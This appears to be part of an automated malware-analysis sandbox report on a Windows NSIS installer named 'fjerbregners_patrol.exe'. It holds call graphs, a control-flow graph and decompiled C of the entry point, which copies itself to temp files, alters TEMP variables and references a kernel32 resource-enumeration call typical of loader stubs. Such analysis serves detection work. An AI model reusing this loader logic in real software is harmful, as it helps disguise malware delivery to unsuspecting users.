5464 402e92 21 API calls 5462->5464 5463->5462 5464->5461 5467 402e92 21 API calls 5465->5467 5466->5465 5468 40256d WritePrivateProfileStringA 5467->5468 5469 401aba 5470 401a70 5469->5470 5472 401a7f 5469->5472 5471 402e92 21 API calls 5470->5471 5473 401a75 5471->5473 5474 4064fd 70 API calls 5473->5474 5474->5472 5475 401cba 5476 401cc8 5475->5476 5477 401d16 5475->5477 5480 401d09 5476->5480 5484 401cd7 5476->5484 5478 401d20 5477->5478 5479 401d45 GlobalAlloc 5477->5479 5485 4016ed 5478->5485 5495 40690a lstrcpynA 5478->5495 5482 405d47 21 API calls 5479->5482 5481 405d47 21 API calls 5480->5481 5481->5477 5482->5485 5492 40690a lstrcpynA 5484->5492 5486 401d32 GlobalFree 5486->5485 5488 401ce6 5493 40690a lstrcpynA 5488->5493 5490 401cf5 5494 40690a lstrcpynA 5490->5494 5492->5488 5493->5490 5494->5485 5495->5486 5496 40283b 5497 402855 5496->5497 5498 402845 5496->5498 5500 402e92 21 API calls 5497->5500 5499 402e56 21 API calls 5498->5499 5502 40284b 5499->5502 5501 40285c lstrlenA 5500->5501 5501->5502 5503 40287c 5502->5503 5504 406806 WriteFile 5502->5504 5504->5503 5505 403cbc 5506 403cd1 5505->5506 5507 403de7 5505->5507 5511 405409 22 API calls 5506->5511 5508 403df5 5507->5508 5509 403e68 5507->5509 5512 403e63 5508->5512 5517 403e22 GetDlgItem SendMessageA EnableWindow 5508->5517 5510 403e73 GetDlgItem 5509->5510 5509->5512 5514 403e95 5510->5514 5515 403f36 5510->5515 5516 403d31 5511->5516 5513 4055e0 8 API calls 5512->5513 5518 403f7b 5513->5518 5514->5512 5522 403ec5 SendMessageA LoadCursorA SetCursor 5514->5522 5515->5512 5520 403f47 5515->5520 5519 405409 22 API calls 5516->5519 5534 40542b SendMessageA 5517->5534 5523 403d40 CheckDlgButton EnableWindow GetDlgItem 5519->5523 5526 403f66 5520->5526 5527 403f4f SendMessageA 5520->5527 5535 4067ee ShellExecuteExA 5522->5535 5533 4053f2 SendMessageA 5523->5533 5526->5518 5530 403f6b SendMessageA 5526->5530 5527->5526 5528 403f28 LoadCursorA SetCursor 5528->5515 5529 403d73 SendMessageA 5531 403d98 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5529->5531 5532 403d8f GetSysColor 5529->5532 5530->5518 5531->5518 5532->5531 5533->5529 5534->5512 5535->5528 5536 402b3c 5537 402e56 21 API calls 5536->5537 5538 402b42 5537->5538 5539 402b93 5538->5539 5540 402b83 5538->5540 5541 4016ed 5538->5541 5543 405d47 21 API calls 5539->5543 5542 402e56 21 API calls 5540->5542 5542->5541 5543->5541 5544 401abe 5545 402e92 21 API calls 5544->5545 5546 401ac5 lstrlenA 5545->5546 5549 401acb 5546->5549 5547 402e92 21 API calls 5547->5549 5549->5547 5550 402833 5549->5550 5551 40671a GetFileAttributesA CreateFileA 5549->5551 5551->5549

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 0040360D Relevance: 101.9, APIs: 31, Strings: 27, Instructions: 418stringfilecomCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 0 40360d-403656 SetErrorMode GetVersionExA 1 403697 0->1 2 403658-40366e GetVersionExA 0->2 3 40369b 1->3 4 403670-40367d 2->4 5 40369e 2->5 3->5 8 40368b-403695 4->8 9 40367f-403689 4->9 6 4036a0-4036ad 5->6 7 4036c1-4036c6 5->7 10 4036b7 6->10 11 4036af-4036b5 6->11 12 4036d3 7->12 13 4036c8-4036d1 7->13 8->3 14 4036b9 9->14 10->14 11->14 15 4036d7-40371e 12->15 13->15 14->7 16 403720-403728 call 4066e5 15->16 17 403731 15->17 16->17 23 40372a 16->23 18 403736-403748 call 40604a lstrlenA 17->18 24 40374a-403766 call 4066e5 * 3 18->24 23->17 31 403777-403803 #17 OleInitialize SHGetFileInfoA call 40690a GetCommandLineA call 40690a call 4063e4 CharNextA 24->31 32 403768-40376e 24->32 41 403809 31->41 42 40389f-4038b8 GetTempPathA call 403bd7 31->42 32->31 37 403770 32->37 37->31 43 40380e-403811 41->43 48 403925-40393a DeleteFileA call 40329b 42->48 49 4038ba-4038e0 GetWindowsDirectoryA lstrcatA call 403bd7 42->49 45 403813-40381d 43->45 46 40380b-40380c 43->46 50 403826-40382f 45->50 51 40381f-403822 45->51 46->43 65 403940-403946 48->65 66 403af2 48->66 49->48 63 4038e2-40391f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403bd7 49->63 54 403831-403835 50->54 55 40386d-40387e call 4063e4 50->55 51->50 59 403837-40383d 54->59 60 40384d-403853 54->60 74 403880-403881 55->74 75 403883-403885 55->75 67 403843 59->67 68 40383f-403841 59->68 61 403864-40386b 60->61 62 403855-40385b 60->62 61->55 72 403889-403896 call 40690a 61->72 69 403861 62->69 70 40385d-40385f 62->70 63->48 63->66 76 403948-403956 call 4063e4 65->76 77 40399a-4039a1 call 4058c3 65->77 71 403af6-403b03 call 4035cb OleUninitialize 66->71 67->60 68->60 68->67 69->61 70->61 70->69 88 403b35-403b3c 71->88 89 403b05-403b10 call 406898 71->89 85 40389b 72->85 74->75 75->43 80 403887 75->80 90 403961-403963 76->90 86 4039a6-4039a8 77->86 80->85 85->42 86->71 94 403b42-403b58 GetCurrentProcess OpenProcessToken 88->94 95 403bc3-403bd2 88->95 99 403b12 ExitProcess 89->99 91 403965-40396c 90->91 92 403958-40395e 90->92 96 4039ad-4039d4 call 4062ec lstrlenA call 40690a 91->96 97 40396e-40397c call 406421 91->97 92->91 100 403960 92->100 101 403b91-403b9f call 4066e5 94->101 102 403b5a-403b8b LookupPrivilegeValueA AdjustTokenPrivileges 94->102 95->99 116 4039e5-4039ee 96->116 117 4039d6-4039e0 call 40690a 96->117 97->66 111 403982-403998 call 40690a * 2 97->111 100->90 109 403ba1-403bad 101->109 110 403baf-403bba ExitWindowsEx 101->110 102->101 109->110 115 403bbc-403bbe call 401533 109->115 110->95 110->115 111->77 115->95 122 4039f2-4039f4 116->122 117->116 124 4039f7-403a26 wsprintfA call 405d47 122->124 128 403a28-403a2d call 405cec 124->128 129 403a2f call 405ccc 124->129 133 403a34-403a36 128->133 129->133 134 403a81-403aac SetCurrentDirectoryA call 4060e5 CopyFileA 133->134 135 403a38-403a48 GetFileAttributesA 133->135 134->66 143 403aae-403adb call 4060e5 call 405d47 call 4064ba 134->143 137 403b18-403b20 135->137 138 403a4e-403a5b DeleteFileA 135->138 137->122 141 403b26 137->141 138->137 139 403a61-403a72 call 4064fd 138->139 139->137 146 403a78-403a7c 139->146 141->66 152 403b28-403b33 CloseHandle 143->152 153 403add-403ae2 143->153 146->124 152->71 153->66 154 403ae4-403af0 call 4063bd 153->154 154->66 154->146
                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                            			_entry_() {
				int _v354;
				struct _SHFILEINFOA _v356;
				signed int _v360;
				char _v475;
				intOrPtr _v487;
				struct _OSVERSIONINFOA _v508;
				int _v536;
				int _v540;
				struct _TOKEN_PRIVILEGES _v552;
				void* _v556;
				CHAR* _v560;
				int _v564;
				long _v576;
				void* _v584;
				intOrPtr _t60;
				signed int _t61;
				intOrPtr* _t74;
				CHAR* _t78;
				signed int _t79;
				void* _t87;
				CHAR* _t89;
				CHAR* _t91;
				void* _t95;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t105;
				signed int _t106;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t133;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t144;
				intOrPtr _t146;
				signed char _t147;
				CHAR* _t152;
				int _t154;
				void* _t156;
				signed int _t161;
				long _t163;
				void* _t168;
				CHAR* _t169;
				CHAR* _t171;
				void* _t174;
				void* _t176;
				int _t177;
				CHAR* _t179;
				signed int _t181;
				signed int _t182;
				CHAR* _t183;
				void* _t184;

				_t184 =  &_v536;
				_t169 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v536 = 0;
				_t181 = 0; // executed
				SetErrorMode(0x8001); // executed
				asm("xorps xmm0, xmm0");
				_v508.szCSDVersion = 0;
				asm("movlpd [esp+0xc4], xmm0");
				_v508.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v508) != 0) {
					_t60 = _v508.dwPlatformId;
					L6:
					__eflags = _t60 - 2;
					L7:
					if(__eflags >= 0) {
						L12:
						if(_v508.dwMajorVersion >= 0xa) {
							_t61 = _v508.dwBuildNumber;
						} else {
							_t61 = _v508.dwBuildNumber & 0x0000ffff;
							_v508.dwBuildNumber = _t61;
						}
						 *0x4240f8 = _t61;
						_t161 = ((_v508.dwMajorVersion & 0x000000ff) << 0x00000008 & 0x0000ffff | _v508.dwMinorVersion & 0x000000ff) << 0x00000010 | (_v360 & 0x000000ff) << 0x00000008 & 0x0000ffff | _v354 & 0x000000ff;
						 *0x4240fc = _t161;
						if(_t161 >> 0x10 != 0x600) {
							_t144 = E004066E5(0);
							if(_t144 != 0) {
								 *_t144(0xc00);
							}
						}
						_t171 = "UXTHEME";
						do {
							E0040604A(_t171); // executed
							_t171 =  &(( &(_t171[1]))[lstrlenA(_t171)]);
						} while ( *_t171 != 0);
						E004066E5(0xc);
						 *0x4237f0 = E004066E5(0xa);
						_t74 = E004066E5(8);
						if(_t74 != 0) {
							_t74 =  *_t74(0x1e);
							if(_t74 != 0) {
								 *0x4240fc =  *0x4240fc | 0x00000080;
							}
						}
						__imp__#17();
						__imp__OleInitialize(0); // executed
						 *0x424060 = _t74;
						SHGetFileInfoA(0x408462, 0,  &_v356, 0x160, 0); // executed
						E0040690A("Apteres Setup", "NSIS Error");
						_t78 = GetCommandLineA();
						_t152 = "\"C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe\"";
						_t79 = E0040690A(_t152, _t78);
						 *0x4237f4 = 0x400000;
						_t83 =  ==  ?  &M0042A001 : _t152;
						_t163 = CharNextA(E004063E4( ==  ?  &M0042A001 : _t152, 0x20 + (_t79 & 0xffffff00 | "\"C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe\"" == 0x00000022) * 2));
						_t153 = _t163;
						_v576 = _t163;
						_t168 =  *_t163;
						if(_t168 == 0) {
							L45:
							GetTempPathA(0x400, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\"); // executed
							_t87 = E00403BD7(_t210);
							_t211 = _t87;
							if(_t87 != 0) {
								L48:
								DeleteFileA("1033"); // executed
								_push(_t181);
								_t89 = E0040329B(_t213);
								_t169 = _t89;
								if(_t169 != 0) {
									L74:
									_t154 = _v564;
									L75:
									E004035CB();
									__imp__OleUninitialize();
									if(_t169 == 0) {
										__eflags =  *0x4240d4;
										if( *0x4240d4 == 0) {
											L88:
											__eflags =  *0x4240ec - 0xffffffff;
											ExitProcess(_t154);
											L77:
										}
										_t112 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v556);
										__eflags = _t112;
										if(_t112 != 0) {
											LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v552.Privileges));
											__eflags = 0;
											_v552.PrivilegeCount = 1;
											_v540 = 2;
											AdjustTokenPrivileges(_v556, 0,  &_v552, 0, 0, 0);
										}
										_t113 = E004066E5(4);
										__eflags = _t113;
										if(_t113 == 0) {
											L86:
											_t114 = ExitWindowsEx(2, 0x80040002);
											__eflags = _t114;
											if(_t114 != 0) {
												goto L88;
											}
											goto L87;
										} else {
											_t116 =  *_t113(0, 0, 0, 0x25, 0x80040002);
											__eflags = _t116;
											if(_t116 == 0) {
												L87:
												E00401533(9);
												goto L88;
											}
											goto L86;
										}
									}
									E00406898(_t169, 0x200010);
									ExitProcess(2);
									goto L77;
								}
								if( *0x424004 == _t89) {
									L57:
									 *0x4240ec =  *0x4240ec | 0xffffffff;
									_t154 = E004058C3(_t163);
									goto L75;
								}
								_t183 = "\"C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe\"";
								_t176 = E004063E4(_t183, _t89);
								while(_t176 >= _t183) {
									__eflags =  *_t176 - 0x3d3f5f20;
									if(__eflags == 0) {
										break;
									}
									_t176 = _t176 - 1;
									__eflags = _t176;
								}
								_t169 = "Error launching installer";
								_t217 = _t176 - _t183;
								if(_t176 < _t183) {
									_v556 = E004062EC();
									_t177 = lstrlenA("C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
									E0040690A("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", _t153);
									__eflags = "C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne";
									if("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne" == 0) {
										E0040690A("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne", "C:\\Users\\Arthur\\Desktop");
									}
									_t41 = _t177 + "C:\\Users\\Arthur\\AppData\\Local\\Temp\\"; // 0x42b400
									_t91 = _t41;
									_t154 = 1;
									__eflags = 1;
									_v560 = _t91;
									do {
										_t174 = 0;
										__eflags = 0;
										_t182 = _t154 & 0x0000ffff;
										while(1) {
											wsprintfA(_t91, "~nsu%X.tmp", _t182);
											_t184 = _t184 + 0xc;
											_push( *((intOrPtr*)( *0x424010 + 0x120)));
											_push("916");
											E00405D47();
											__eflags = _v556;
											_push("C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
											if(_v556 == 0) {
												_t95 = E00405CCC();
											} else {
												_t95 = E00405CEC();
											}
											__eflags = _t95;
											if(_t95 != 0) {
											}
											L66:
											_t106 = GetFileAttributesA("916");
											__eflags = _t106 & 0x00000400;
											if((_t106 & 0x00000400) != 0) {
												break;
											}
											__eflags = DeleteFileA("916");
											if(__eflags == 0) {
												break;
											}
											_push("true");
											_push("C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
											E004064FD(__eflags);
											_t109 = _t174;
											_t174 = _t174 + 1;
											__eflags = _t109;
											if(_t109 != 0) {
												break;
											}
											L69:
											_t91 =  *(_t184 + 0x14);
											wsprintfA(_t91, "~nsu%X.tmp", _t182);
											_t184 = _t184 + 0xc;
											_push( *((intOrPtr*)( *0x424010 + 0x120)));
											_push("916");
											E00405D47();
											__eflags = _v556;
											_push("C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
											if(_v556 == 0) {
												_t95 = E00405CCC();
											} else {
												_t95 = E00405CEC();
											}
											__eflags = _t95;
											if(_t95 != 0) {
											}
											L70:
											SetCurrentDirectoryA("C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
											E004060E5("C:\\Users\\Arthur\\AppData\\Local\\Temp\\", 0);
											_t98 = CopyFileA("C:\\Users\\Arthur\\Desktop\\fjerbregners_patrol.exe", "916", "true");
											__eflags = _t98;
											if(_t98 == 0) {
												goto L74;
											}
											E004060E5("916", 0);
											_push( *((intOrPtr*)( *0x424010 + 0x124)));
											_push("1918990196");
											E00405D47();
											_t102 = E004064BA("1918990196");
											__eflags = _t102;
											if(_t102 != 0) {
												CloseHandle(_t102);
												_t169 = 0;
												_t154 = 0;
												goto L75;
											}
											_t104 = _t174;
											_t174 = _t174 + 1;
											__eflags = _t104;
											if(_t104 != 0) {
												goto L74;
											}
											_t105 = E004063BD("916");
											__eflags = _t105;
											if(_t105 == 0) {
												goto L69;
											}
											goto L74;
										}
										_t91 = _v560;
										_t154 = _t154 + 1;
									} while (_t154 != 0);
									goto L74;
								}
								 *_t176 = 0;
								_t178 = _t176 + 4;
								if(E00406421(_t217, _t176 + 4) == 0) {
									goto L74;
								}
								E0040690A("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne", _t178);
								E0040690A("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne\\Vrvleversenes\\lsernes\\Volantly", _t178);
								_t169 = 0;
								goto L57;
							}
							GetWindowsDirectoryA("C:\\Users\\Arthur\\AppData\\Local\\Temp\\", 0x3fb);
							lstrcatA("C:\\Users\\Arthur\\AppData\\Local\\Temp\\", "\\Temp");
							_t133 = E00403BD7(_t211);
							_t212 = _t133;
							if(_t133 != 0) {
								goto L48;
							}
							GetTempPathA(0x3fc, "C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
							_t179 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
							lstrcatA(_t179, "Low");
							SetEnvironmentVariableA("TEMP", _t179);
							SetEnvironmentVariableA("TMP", "C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
							_t138 = E00403BD7(_t212);
							_t213 = _t138;
							if(_t138 == 0) {
								goto L74;
							}
							goto L48;
						} else {
							L26:
							while(_t168 != 0x20) {
								_v556 = 0x20;
								_t156 = _t168;
								if(_t168 == 0x22) {
									_t156 =  *(_t163 + 1);
									_v556 = _t168;
								}
								_t33 = _t163 + 1; // 0x2
								_t140 =  !=  ? _t163 : _t33;
								if(_t156 != 0x2f) {
									L39:
									_t163 = E004063E4(_t140, _v556);
									_t168 =  *_t163;
									if(_t168 == 0x22) {
										_t163 = _t163 + 1;
										_t168 =  *_t163;
									}
									_t210 = _t168;
									if(_t168 != 0) {
										continue;
									} else {
										goto L44;
									}
								} else {
									_t140 = _t140 + 1;
									if( *_t140 == 0x53) {
										_t163 =  *((intOrPtr*)(_t140 + 1));
										if(_t163 == 0x20 || _t163 == 0) {
											 *0x4240e0 = 1;
										}
									}
									if( *_t140 == 0x4352434e) {
										_t163 =  *((intOrPtr*)(_t140 + 4));
										if(_t163 == 0x20 || _t163 == 0) {
											_t181 = _t181 | 0x00000004;
										}
									}
									if( *((intOrPtr*)(_t140 - 2)) == 0x3d442f20) {
										 *((char*)(_t140 - 2)) = 0;
										__eflags = _t140 + 2;
										E0040690A("C:\\Users\\Arthur\\AppData\\Roaming\\drvelens\\anskrevne", _t140 + 2);
										L44:
										_t153 = _v552.PrivilegeCount;
										goto L45;
									} else {
										goto L39;
									}
								}
							}
							_t163 = _t163 + 1;
							__eflags = _t163;
							_t168 =  *_t163;
							goto L26;
						}
					} else {
						_t146 = _v487;
						_v354 = 0;
						__eflags = _t146 - 0x41;
						if(_t146 < 0x41) {
							_t147 = 0;
							__eflags = 0;
						} else {
							asm("cbw");
							_t147 = _t146 - 0x40;
						}
						L11:
						_v360 = _t147;
						goto L12;
					}
				}
				_v508.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v508);
				_t60 = _v508.dwPlatformId;
				if(_t60 != 2) {
					goto L7;
				}
				_v354 = 4;
				if(_v508.szCSDVersion != 0x53) {
					_v360 = 0;
					goto L6;
				} else {
					_t147 = _v475 - 0x30;
					goto L11;
				}
			}


























































                                                                                                                                                                                            0x0040360d
                                                                                                                                                                                            0x00403619
                                                                                                                                                                                            0x00403623
                                                                                                                                                                                            0x00403627
                                                                                                                                                                                            0x00403629
                                                                                                                                                                                            0x00403639
                                                                                                                                                                                            0x0040363c
                                                                                                                                                                                            0x00403641
                                                                                                                                                                                            0x0040364a
                                                                                                                                                                                            0x00403656
                                                                                                                                                                                            0x00403697
                                                                                                                                                                                            0x0040369b
                                                                                                                                                                                            0x0040369b
                                                                                                                                                                                            0x0040369e
                                                                                                                                                                                            0x0040369e
                                                                                                                                                                                            0x004036c1
                                                                                                                                                                                            0x004036c6
                                                                                                                                                                                            0x004036d3
                                                                                                                                                                                            0x004036c8
                                                                                                                                                                                            0x004036c8
                                                                                                                                                                                            0x004036cd
                                                                                                                                                                                            0x004036cd
                                                                                                                                                                                            0x004036d7
                                                                                                                                                                                            0x0040370b
                                                                                                                                                                                            0x00403712
                                                                                                                                                                                            0x0040371e
                                                                                                                                                                                            0x00403721
                                                                                                                                                                                            0x00403728
                                                                                                                                                                                            0x0040372f
                                                                                                                                                                                            0x0040372f
                                                                                                                                                                                            0x00403728
                                                                                                                                                                                            0x00403731
                                                                                                                                                                                            0x00403736
                                                                                                                                                                                            0x00403737
                                                                                                                                                                                            0x00403744
                                                                                                                                                                                            0x00403746
                                                                                                                                                                                            0x0040374c
                                                                                                                                                                                            0x0040375a
                                                                                                                                                                                            0x0040375f
                                                                                                                                                                                            0x00403766
                                                                                                                                                                                            0x0040376a
                                                                                                                                                                                            0x0040376e
                                                                                                                                                                                            0x00403770
                                                                                                                                                                                            0x00403770
                                                                                                                                                                                            0x0040376e
                                                                                                                                                                                            0x00403777
                                                                                                                                                                                            0x0040377e
                                                                                                                                                                                            0x0040378a
                                                                                                                                                                                            0x0040379d
                                                                                                                                                                                            0x004037ad
                                                                                                                                                                                            0x004037b2
                                                                                                                                                                                            0x004037b9
                                                                                                                                                                                            0x004037bf
                                                                                                                                                                                            0x004037d0
                                                                                                                                                                                            0x004037e7
                                                                                                                                                                                            0x004037f7
                                                                                                                                                                                            0x004037f9
                                                                                                                                                                                            0x004037fb
                                                                                                                                                                                            0x004037ff
                                                                                                                                                                                            0x00403803
                                                                                                                                                                                            0x0040389f
                                                                                                                                                                                            0x004038af
                                                                                                                                                                                            0x004038b1
                                                                                                                                                                                            0x004038b6
                                                                                                                                                                                            0x004038b8
                                                                                                                                                                                            0x00403925
                                                                                                                                                                                            0x0040392a
                                                                                                                                                                                            0x00403930
                                                                                                                                                                                            0x00403931
                                                                                                                                                                                            0x00403936
                                                                                                                                                                                            0x0040393a
                                                                                                                                                                                            0x00403af2
                                                                                                                                                                                            0x00403af2
                                                                                                                                                                                            0x00403af6
                                                                                                                                                                                            0x00403af6
                                                                                                                                                                                            0x00403afb
                                                                                                                                                                                            0x00403b03
                                                                                                                                                                                            0x00403b35
                                                                                                                                                                                            0x00403b3c
                                                                                                                                                                                            0x00403bc3
                                                                                                                                                                                            0x00403bc3
                                                                                                                                                                                            0x00403b12
                                                                                                                                                                                            0x00403b12
                                                                                                                                                                                            0x00403b12
                                                                                                                                                                                            0x00403b50
                                                                                                                                                                                            0x00403b56
                                                                                                                                                                                            0x00403b58
                                                                                                                                                                                            0x00403b66
                                                                                                                                                                                            0x00403b6c
                                                                                                                                                                                            0x00403b6e
                                                                                                                                                                                            0x00403b7d
                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                            0x00403b93
                                                                                                                                                                                            0x00403b9d
                                                                                                                                                                                            0x00403b9f
                                                                                                                                                                                            0x00403baf
                                                                                                                                                                                            0x00403bb2
                                                                                                                                                                                            0x00403bb8
                                                                                                                                                                                            0x00403bba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403ba1
                                                                                                                                                                                            0x00403ba9
                                                                                                                                                                                            0x00403bab
                                                                                                                                                                                            0x00403bad
                                                                                                                                                                                            0x00403bbc
                                                                                                                                                                                            0x00403bbe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403bbe
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403bad
                                                                                                                                                                                            0x00403b9f
                                                                                                                                                                                            0x00403b0b
                                                                                                                                                                                            0x00403b12
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403b12
                                                                                                                                                                                            0x00403946
                                                                                                                                                                                            0x0040399a
                                                                                                                                                                                            0x0040399a
                                                                                                                                                                                            0x004039a6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004039a6
                                                                                                                                                                                            0x00403949
                                                                                                                                                                                            0x00403954
                                                                                                                                                                                            0x00403961
                                                                                                                                                                                            0x00403958
                                                                                                                                                                                            0x0040395e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403960
                                                                                                                                                                                            0x00403960
                                                                                                                                                                                            0x00403960
                                                                                                                                                                                            0x00403965
                                                                                                                                                                                            0x0040396a
                                                                                                                                                                                            0x0040396c
                                                                                                                                                                                            0x004039b7
                                                                                                                                                                                            0x004039c6
                                                                                                                                                                                            0x004039c8
                                                                                                                                                                                            0x004039cd
                                                                                                                                                                                            0x004039d4
                                                                                                                                                                                            0x004039e0
                                                                                                                                                                                            0x004039e0
                                                                                                                                                                                            0x004039e7
                                                                                                                                                                                            0x004039e7
                                                                                                                                                                                            0x004039ed
                                                                                                                                                                                            0x004039ed
                                                                                                                                                                                            0x004039ee
                                                                                                                                                                                            0x004039f2
                                                                                                                                                                                            0x004039f2
                                                                                                                                                                                            0x004039f2
                                                                                                                                                                                            0x004039f4
                                                                                                                                                                                            0x004039f7
                                                                                                                                                                                            0x004039fe
                                                                                                                                                                                            0x00403a09
                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                            0x00403a12
                                                                                                                                                                                            0x00403a17
                                                                                                                                                                                            0x00403a1c
                                                                                                                                                                                            0x00403a21
                                                                                                                                                                                            0x00403a26
                                                                                                                                                                                            0x00403a2f
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a34
                                                                                                                                                                                            0x00403a36
                                                                                                                                                                                            0x00403a36
                                                                                                                                                                                            0x00403a38
                                                                                                                                                                                            0x00403a3d
                                                                                                                                                                                            0x00403a43
                                                                                                                                                                                            0x00403a48
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403a59
                                                                                                                                                                                            0x00403a5b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403a61
                                                                                                                                                                                            0x00403a63
                                                                                                                                                                                            0x00403a68
                                                                                                                                                                                            0x00403a6d
                                                                                                                                                                                            0x00403a6f
                                                                                                                                                                                            0x00403a70
                                                                                                                                                                                            0x00403a72
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                            0x004039fe
                                                                                                                                                                                            0x00403a09
                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                            0x00403a12
                                                                                                                                                                                            0x00403a17
                                                                                                                                                                                            0x00403a1c
                                                                                                                                                                                            0x00403a21
                                                                                                                                                                                            0x00403a26
                                                                                                                                                                                            0x00403a2f
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a28
                                                                                                                                                                                            0x00403a34
                                                                                                                                                                                            0x00403a36
                                                                                                                                                                                            0x00403a36
                                                                                                                                                                                            0x00403a81
                                                                                                                                                                                            0x00403a86
                                                                                                                                                                                            0x00403a93
                                                                                                                                                                                            0x00403aa4
                                                                                                                                                                                            0x00403aaa
                                                                                                                                                                                            0x00403aac
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403ab5
                                                                                                                                                                                            0x00403abf
                                                                                                                                                                                            0x00403ac5
                                                                                                                                                                                            0x00403aca
                                                                                                                                                                                            0x00403ad4
                                                                                                                                                                                            0x00403ad9
                                                                                                                                                                                            0x00403adb
                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                            0x00403b2f
                                                                                                                                                                                            0x00403b31
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403b31
                                                                                                                                                                                            0x00403add
                                                                                                                                                                                            0x00403adf
                                                                                                                                                                                            0x00403ae0
                                                                                                                                                                                            0x00403ae2
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                            0x00403aee
                                                                                                                                                                                            0x00403af0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403af0
                                                                                                                                                                                            0x00403b18
                                                                                                                                                                                            0x00403b1c
                                                                                                                                                                                            0x00403b1d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403b26
                                                                                                                                                                                            0x0040396e
                                                                                                                                                                                            0x00403971
                                                                                                                                                                                            0x0040397c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403988
                                                                                                                                                                                            0x00403993
                                                                                                                                                                                            0x00403998
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403998
                                                                                                                                                                                            0x004038c4
                                                                                                                                                                                            0x004038d4
                                                                                                                                                                                            0x004038d9
                                                                                                                                                                                            0x004038de
                                                                                                                                                                                            0x004038e0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004038ec
                                                                                                                                                                                            0x004038f3
                                                                                                                                                                                            0x004038f9
                                                                                                                                                                                            0x0040390a
                                                                                                                                                                                            0x00403916
                                                                                                                                                                                            0x00403918
                                                                                                                                                                                            0x0040391d
                                                                                                                                                                                            0x0040391f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403809
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040380e
                                                                                                                                                                                            0x00403813
                                                                                                                                                                                            0x00403818
                                                                                                                                                                                            0x0040381d
                                                                                                                                                                                            0x0040381f
                                                                                                                                                                                            0x00403822
                                                                                                                                                                                            0x00403822
                                                                                                                                                                                            0x00403826
                                                                                                                                                                                            0x00403829
                                                                                                                                                                                            0x0040382f
                                                                                                                                                                                            0x0040386d
                                                                                                                                                                                            0x00403877
                                                                                                                                                                                            0x00403879
                                                                                                                                                                                            0x0040387e
                                                                                                                                                                                            0x00403880
                                                                                                                                                                                            0x00403881
                                                                                                                                                                                            0x00403881
                                                                                                                                                                                            0x00403883
                                                                                                                                                                                            0x00403885
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403887
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403887
                                                                                                                                                                                            0x00403831
                                                                                                                                                                                            0x00403831
